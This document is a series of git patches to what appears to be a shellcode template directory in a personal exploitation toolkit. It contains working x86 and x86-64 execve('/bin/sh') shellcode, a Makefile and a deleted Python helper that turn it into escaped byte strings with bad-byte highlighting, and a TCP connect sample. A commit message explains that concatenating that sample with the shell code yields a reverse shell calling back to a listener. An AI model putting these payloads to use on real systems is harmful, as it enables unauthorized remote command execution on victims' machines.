From d1853b2ea3b52cf20d08c428769a2a4fa3bf6b5c Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sat, 24 Dec 2022 07:42:07 -0500
Subject: shellcode: Drop SYS_EXIT samples

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/exit32.asm | 8 --------
 templates/shellcode/exit64.asm | 8 --------
 2 files changed, 16 deletions(-)
 delete mode 100644 templates/shellcode/exit32.asm
 delete mode 100644 templates/shellcode/exit64.asm

diff --git a/templates/shellcode/exit32.asm b/templates/shellcode/exit32.asm
deleted file mode 100644
index 559c89c..0000000
--- a/templates/shellcode/exit32.asm
+++ /dev/null
@@ -1,8 +0,0 @@
-[SECTION .text]
-global _start
-
-_start:
-    xor     ebx, ebx
-    xor     eax, eax
-    mov      al, 0x1
-    int     0x80
diff --git a/templates/shellcode/exit64.asm b/templates/shellcode/exit64.asm
deleted file mode 100644
index fb899a2..0000000
--- a/templates/shellcode/exit64.asm
+++ /dev/null
@@ -1,8 +0,0 @@
-[SECTION .text]
-global _start
-
-_start:
-    xor     rdi, rdi
-    mov      al, 0x3c
-    cdq
-    syscall
-- 
cgit v1.2.3


From c41649b5077eb3e0d66043658df8bccbdfef0f1a Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sat, 24 Dec 2022 07:50:44 -0500
Subject: shellcode: Move example code to a new directory

This is mainly done to keep the top working directory (where the
Makefile lives) cleaner.

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/examples/shell32.asm | 15 +++++++++++++++
 templates/shellcode/examples/shell64.asm | 16 ++++++++++++++++
 templates/shellcode/shell32.asm          | 15 ---------------
 templates/shellcode/shell64.asm          | 16 ----------------
 4 files changed, 31 insertions(+), 31 deletions(-)
 create mode 100644 templates/shellcode/examples/shell32.asm
 create mode 100644 templates/shellcode/examples/shell64.asm
 delete mode 100644 templates/shellcode/shell32.asm
 delete mode 100644 templates/shellcode/shell64.asm

diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm
new file mode 100644
index 0000000..5ff2e12
--- /dev/null
+++ b/templates/shellcode/examples/shell32.asm
@@ -0,0 +1,15 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/46809
+
+_start:
+    xor     ecx, ecx
+    xor     edx, edx
+    push    0xb
+    pop     eax
+    push    ecx
+    push    0x68732f2f
+    push    0x6e69622f
+    mov     ebx, esp
+    int     0x80
diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm
new file mode 100644
index 0000000..2353b6f
--- /dev/null
+++ b/templates/shellcode/examples/shell64.asm
@@ -0,0 +1,16 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/47008
+
+_start:
+    xor     rsi, rsi
+    xor     rdx, rdx
+    push    rsi
+    mov     rdi, 0x68732f2f6e69622f
+    push    rdi
+    push    rsp
+    pop     rdi
+    mov      al, 0x3b
+    cdq
+    syscall
diff --git a/templates/shellcode/shell32.asm b/templates/shellcode/shell32.asm
deleted file mode 100644
index 5ff2e12..0000000
--- a/templates/shellcode/shell32.asm
+++ /dev/null
@@ -1,15 +0,0 @@
-[SECTION .text]
-global _start
-
-; https://www.exploit-db.com/shellcodes/46809
-
-_start:
-    xor     ecx, ecx
-    xor     edx, edx
-    push    0xb
-    pop     eax
-    push    ecx
-    push    0x68732f2f
-    push    0x6e69622f
-    mov     ebx, esp
-    int     0x80
diff --git a/templates/shellcode/shell64.asm b/templates/shellcode/shell64.asm
deleted file mode 100644
index 2353b6f..0000000
--- a/templates/shellcode/shell64.asm
+++ /dev/null
@@ -1,16 +0,0 @@
-[SECTION .text]
-global _start
-
-; https://www.exploit-db.com/shellcodes/47008
-
-_start:
-    xor     rsi, rsi
-    xor     rdx, rdx
-    push    rsi
-    mov     rdi, 0x68732f2f6e69622f
-    push    rdi
-    push    rsp
-    pop     rdi
-    mov      al, 0x3b
-    cdq
-    syscall
-- 
cgit v1.2.3


From 806f9029d160c5f47f0b49db288f469718424f7b Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sat, 24 Dec 2022 08:02:29 -0500
Subject: shellcode: Update Makefile

This patch brings various improvements to the shellcoding experience:

    - There is no longer a hardcoded assembly sample that gets built

        Although the default was pretty sane, it will be more convenient
        to experiment, or build more complex shellcodes using a new
        untracked filename as the main build target: code.asm

        If code.asm is missing, then as before, it will be created from
        shell64.asm (the old hard default).

        The Makefile targets will compile code.* files.

    - Hex string generation and bad char detection are improved

        grep is used to highlight detected bad chars right in place.
        This entire feature is now implemented directly in the Makefile
        using a couple command lines, making shelltool deprecated.

    - Builtin disassembly

        Just run 'make disas' instead of manually invoking objdump.  The
        output is also filtered through grep for bad char detection.

    - ELF executable is optional

        Rather than linking an executable all the time, just run
        'make elf' when you need it.

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/Makefile | 38 ++++++++++++++++++++++++++------------
 1 file changed, 26 insertions(+), 12 deletions(-)

diff --git a/templates/shellcode/Makefile b/templates/shellcode/Makefile
index 2e67adc..757878f 100644
--- a/templates/shellcode/Makefile
+++ b/templates/shellcode/Makefile
@@ -1,17 +1,31 @@
-.PHONY: all
+LDFLAGS?=
+FORMAT?=elf64
+CODE?=examples/shell64.asm
+GREP=00|0a
 
-all: shell32.elf shell64.elf
-	@objdump -d shell32.elf | ./shelltool.py
-	@objdump -d shell64.elf | ./shelltool.py
+.PHONY: all elf disas
 
-shell32.o: shell32.asm
-	nasm -f elf shell32.asm -o shell32.o
+# Format bytecode as an escaped string, highlight bad bytes
+all: code.bin
+	@xxd -i -c 16 <code.bin \
+		| sed 's/,//g;s/ 0/\\/g;s/^ */"/g;s/$$/"/g' \
+		| grep --color=always -E '$(GREP)|$$'
 
-shell32.elf: shell32.o
-	ld -melf_i386 shell32.o -o shell32.elf
+elf: code.o
+	ld $(LDFLAGS) code.o -o code.elf
 
-shell64.o: shell64.asm
-	nasm -f elf64 shell64.asm -o shell64.o
+disas: code.o
+	@objdump -d code.o \
+		| grep --color=always -E '$(GREP)|$$'
 
-shell64.elf: shell64.o
-	ld shell64.o -o shell64.elf
+code.bin: code.o
+	objcopy -O binary code.o code.bin
+
+code.o: code.asm
+	nasm -f '$(FORMAT)' code.asm -o code.o
+
+code.asm:
+	cp '$(CODE)' code.asm
+
+
+# -melf_i386
-- 
cgit v1.2.3


From ad106276e2935085f9201ffa65423032f8fcff6b Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sat, 24 Dec 2022 15:25:26 -0500
Subject: shellcode: Remove shelltool

shelltool is now deprecated, made redundant by the updated Makefile.

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/shelltool.py | 30 ------------------------------
 1 file changed, 30 deletions(-)
 delete mode 100755 templates/shellcode/shelltool.py

diff --git a/templates/shellcode/shelltool.py b/templates/shellcode/shelltool.py
deleted file mode 100755
index b95a8cd..0000000
--- a/templates/shellcode/shelltool.py
+++ /dev/null
@@ -1,30 +0,0 @@
-#!/usr/bin/env python
-
-# This script will convert shellcode disassembly into an escaped string literal
-# and warn about problematic bytes in the payload.
-#     objdump -d elf | ./shelltool.py
-
-import sys
-
-name = None
-bytecode = []
-badchars = [ 0x00, 0x0a ]
-
-for line in sys.stdin:
-    for tok in line.split():
-        if name is None:
-            name = tok
-        if len(tok) == 2:
-            try:
-                bytecode.append(int(tok, base=16))
-            except:
-                pass
-
-result = ''.join([ "\\x%02x"%(x) for x in bytecode ])
-result = f'{name}"{result}"'
-
-for x in badchars:
-    if x in bytecode:
-        result += f'    **0x{"%02x"%(x)} detected**'
-
-print(result)
-- 
cgit v1.2.3


From f21e743212f02dbfb560fa74d983a7e156722d11 Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sun, 15 Jan 2023 08:06:42 -0500
Subject: shellcode: Update /bin/sh shellcodes

The shell-spawning shellcodes are rewritten to address the following
concerns:

    - The array parameters to execve are now set properly, to valid
      arrays on the stack, instead of NULL pointers.

    - The cdq instruction is no longer used to sign-extend the rax
      register, since it has not been producing the expected results in
      gdb.

    - Labels, sections, and other file metadata are removed in order to
      support concatenation of shellcode samples to make more complex
      code.

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/examples/shell32.asm | 29 ++++++++++++-------------
 templates/shellcode/examples/shell64.asm | 36 +++++++++++++++++++-------------
 2 files changed, 37 insertions(+), 28 deletions(-)

diff --git a/templates/shellcode/examples/shell32.asm b/templates/shellcode/examples/shell32.asm
index 5ff2e12..6238469 100644
--- a/templates/shellcode/examples/shell32.asm
+++ b/templates/shellcode/examples/shell32.asm
@@ -1,15 +1,16 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/46809
+; See shell64.asm for more details.
 
-; https://www.exploit-db.com/shellcodes/46809
-
-_start:
-    xor     ecx, ecx
-    xor     edx, edx
-    push    0xb
-    pop     eax
-    push    ecx
-    push    0x68732f2f
-    push    0x6e69622f
-    mov     ebx, esp
-    int     0x80
+; execve("/bin/sh", ["/bin/sh"], [])
+xor     eax, eax
+xor     ecx, ecx
+push    ecx
+push    0x68732f2f
+push    0x6e69622f
+mov     ebx, esp
+push    ecx
+mov     edx, esp
+push    ebx
+mov     ecx, esp
+mov      al, 11
+int     0x80
diff --git a/templates/shellcode/examples/shell64.asm b/templates/shellcode/examples/shell64.asm
index 2353b6f..3812c33 100644
--- a/templates/shellcode/examples/shell64.asm
+++ b/templates/shellcode/examples/shell64.asm
@@ -1,16 +1,24 @@
-[SECTION .text]
-global _start
+; Originally based on https://www.exploit-db.com/shellcodes/47008
 
-; https://www.exploit-db.com/shellcodes/47008
+; stack layout
+;
+;     ┏━━━━━━━━━━━━━━┓
+;     ┃              v
+;   [ argv0, NULL ] "/bin//sh" NULL
+;     ^      ^       ^
+;     ┃      ┃       ┃
+;     argv   envp    filename
 
-_start:
-    xor     rsi, rsi
-    xor     rdx, rdx
-    push    rsi
-    mov     rdi, 0x68732f2f6e69622f
-    push    rdi
-    push    rsp
-    pop     rdi
-    mov      al, 0x3b
-    cdq
-    syscall
+; execve("/bin/sh", ["/bin/sh"], [])
+xor     rax, rax
+xor     rsi, rsi
+mov     rdi, 0x68732f2f6e69622f
+push    rsi
+push    rdi
+mov     rdi, rsp
+push    rsi
+mov     rdx, rsp
+push    rdi
+mov     rsi, rsp
+mov      al, 59
+syscall
-- 
cgit v1.2.3


From 1418eaf3054967f1d9856279f1988279c1009ba1 Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sun, 15 Jan 2023 09:29:14 -0500
Subject: shellcode: Add sample for connecting a TCP socket

This sample can be used to create a reverse shell when combined with the
shell64 sample:

    cat examples/{tcp64,shell64}.asm >code.asm
    make
    ...

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/examples/tcp64.asm | 49 ++++++++++++++++++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100644 templates/shellcode/examples/tcp64.asm

diff --git a/templates/shellcode/examples/tcp64.asm b/templates/shellcode/examples/tcp64.asm
new file mode 100644
index 0000000..1ec3bc8
--- /dev/null
+++ b/templates/shellcode/examples/tcp64.asm
@@ -0,0 +1,49 @@
+; Based loosely on https://systemoverlord.com/2018/10/30/understanding-shellcode-the-reverse-shell.html
+
+; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
+xor     rax, rax
+xor     rdi, rdi
+xor     rsi, rsi
+xor     rdx, rdx
+mov      al, 41
+mov     dil, 2
+mov     sil, 1
+syscall
+
+; !! Edit this section to connect back to your listener !!
+;
+; struct sockaddr_in {                  // Struct size: 16
+;   short int           sin_family;     // AF_INET (2)
+;   unsigned short int  sin_port;       // Set to 8080 below
+;   struct in_addr      sin_addr;       // Set to 127.0.0.1 below
+;   unsigned char       sin_zero[8];
+; };
+;
+; struct in_addr {                      // Struct size: 4
+;   uint32_t s_addr;
+; };
+xor     rbx, rbx
+push    rbx
+mov     rbx, 0x0100007f901f0002
+push    rbx
+
+; connect(fd, sockaddr, sizeof sockaddr)
+mov     rdi, rax
+mov     rsi, rsp
+mov      dl, 16
+xor     rax, rax
+mov      al, 42
+syscall
+
+; dup2(fd, stdin)
+; dup2(fd, stdout)
+; dup2(fd, stderr)
+xor     rsi, rsi
+mov      al, 33
+syscall
+mov     sil, 1
+mov      al, 33
+syscall
+mov     sil, 2
+mov      al, 33
+syscall
-- 
cgit v1.2.3


From 8037b8c5acaeeeff32d6de01c06132a4f5e432bf Mon Sep 17 00:00:00 2001
From: Malfurious <m@lfurio.us>
Date: Sun, 15 Jan 2023 09:57:27 -0500
Subject: Ignore shellcode working files

Signed-off-by: Malfurious <m@lfurio.us>
---
 templates/shellcode/.gitignore | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 templates/shellcode/.gitignore

diff --git a/templates/shellcode/.gitignore b/templates/shellcode/.gitignore
new file mode 100644
index 0000000..e9c55fb
--- /dev/null
+++ b/templates/shellcode/.gitignore
@@ -0,0 +1 @@
+code.*
-- 
cgit v1.2.3